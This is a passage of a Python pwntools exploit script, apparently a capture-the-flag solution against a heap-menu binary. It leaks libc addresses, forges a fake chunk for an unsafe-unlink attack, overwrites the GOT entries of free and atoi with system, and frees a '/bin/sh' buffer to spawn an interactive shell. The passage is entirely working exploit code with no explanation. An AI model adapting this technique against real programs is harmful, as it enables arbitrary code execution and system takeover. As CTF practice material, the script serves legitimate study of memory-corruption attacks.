list_addr_chunk1=leak_addr-0x1910
success('list_addr_chunk1 >> '+hex(list_addr_chunk1))

p.recvuntil('x'*8)
leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
success('leak_addr >> '+hex(leak_addr))
libc_base=leak_addr-0x3c4b78
system_libc=libc_base+libc.sym['system']
success('libc_base >> '+hex(libc_base))
success('system_libc >> '+hex(system_libc))

free_s(1)
free_s(2)
free_s(3)

payload=p64(0x0)+p64(0x80)
payload+=p64(list_addr_chunk1-0x18)+p64(list_addr_chunk1-0x10)
payload=payload.ljust(0x80,'a')
payload+=p64(0x80)+p64(0x90)
payload+='a'*0x80
payload+=p64(0x90)+p64(0x121)
edit_s(0,len(payload),payload)
free_s(1)

free_got=elf.got['free']
payload =p64(4)+p64(1)+p64(0x8)+p64(free_got)
payload +=p64(1)+p64(0x8)+p64(leak_addr)
payload +=p64(1)+p64(0x8)+p64(elf.got['atoi'])
payload = payload.ljust(0x120,'\x00')
edit_s(0,len(payload),payload)

#pause()

atoi_addr= libc.sym['atoi'] + libc_base
system_addr=libc.sym['system'] + libc_base
edit_s(0,0x8,p64(system_addr))
edit_s(1,len("/bin/sh\x00"),"/bin/sh\x00")
free_s(1)

p.interactive()